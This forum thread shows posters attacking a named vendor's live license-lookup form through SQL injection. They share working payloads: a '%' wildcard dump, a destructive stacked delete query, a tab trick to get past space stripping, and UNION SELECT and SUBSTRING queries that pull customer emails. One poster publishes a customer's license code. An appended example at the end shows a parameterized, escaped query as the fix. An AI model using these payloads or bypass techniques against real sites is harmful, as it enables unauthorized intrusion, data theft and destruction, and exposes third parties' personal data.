Easily hacked...


  • http://fixtunes.com/purchasecode.php

    You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.

    As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!



  • That's horrible.  I also don't like the idea that someone can pull up my product key just by knowing my email address.



  • I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


  • Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.



  • @joe.edwards@imaginuity.com said:

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.


    plz send codez



  • @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.


  • @medialint said:

    @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I suppose the wildcards are there so you can work around the character length restriction.



  • Bad query:

        Error #: 1064
        Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
        Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

    They do seem to remove all spaces from your input.... Anyone know how to get around that?


  • @MasterPlanSoftware said:

    Bad query:

        Error #: 1064
        Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
        Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

    They do seem to remove all spaces from your input.... Anyone know how to get around that?

    Use a different kind of whitespace? Like a tab character.

    That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.



  • @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.



  • @MasterPlanSoftware said:

    @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.


    The tab character works, but it'll only run a single query. 


  • abc' union select Email from d_Purchases where Email like 'a%



  • Interesting...

    Purchase Code: afes-sler-@c



  • Good to know that Mr. Fessler's code is AAA5-4E26-K9


  • So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.



  • @joe.edwards@imaginuity.com said:


    abc' union select Email from d_Purchases where Email like 'a%


    And then:

    abc'    union    select     SUBSTRING(Email    FROM    9)     from     d_Purchases     where     Email     like     'a%


  • @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.



  • @PJH said:

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.


    Yeah, already solved. Thanks for your helpfulness...



  • @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.



  • @Heron said:

    @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.

    Is there any actual limit on email address lengths?



  • The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maximum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.



  • So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D

    There's a similar hole on the LimeWire Pro site as well... :)



  • They appear to have fixed it. I now get "Error" when I put in %. 



  • @Jonathan Holland said:

    They appear to have fixed it. I now get "Error" when I put in %.

    Hurray for your efforts! 



  • It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.
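Added example (not code from the thread or from the site in question): the lookup as the posters describe it, with spaces stripped and the text spliced into a LIKE query, next to a version that parameterizes the query and escapes the LIKE metacharacters. The table and rows are constructed; only the column names come from the quoted query.

```python
import sqlite3

# Constructed sample data standing in for the vendor's d_Purchases table.
# Column names (Email, ItemId) are taken from the query quoted in the thread.
SAMPLE_ROWS = [
    ("alice@example.com", "AAAA-1111-AA"),
    ("bob@example.net", "BBBB-2222-BB"),
    ("carol_50%@example.org", "CCCC-3333-CC"),  # legitimate % and _ in an address
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE d_Purchases (Email TEXT, ItemId TEXT)")
    conn.executemany("INSERT INTO d_Purchases VALUES (?, ?)", SAMPLE_ROWS)
    return conn


DB = make_db()


def lookup_unsafe(conn, email):
    # The pattern described in the thread: strip spaces, truncate to 30
    # characters, then splice the raw text into the statement. Neither step
    # stops % or _ from reaching LIKE, so '%' alone matches the first row.
    cleaned = email.replace(" ", "")[:30]
    sql = f"select ItemId from d_Purchases where Email like '{cleaned}' limit 0,1"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    # Escape the escape character first, then the two LIKE metacharacters,
    # so the user's text is matched literally by the ESCAPE clause below.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_safe(conn, email):
    # A bound parameter can never change the statement, and escaping the
    # wildcards closes the second hole: a bare % no longer matches anything.
    sql = ("select ItemId from d_Purchases "
           "where Email like ? escape '\\' limit 0,1")
    return [row[0] for row in conn.execute(sql, (escape_like(email),))]
```

For a lookup that is meant to be exact, comparing with `=` instead of LIKE is simpler still; the LIKE form is kept here because that is the operator the thread is about.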

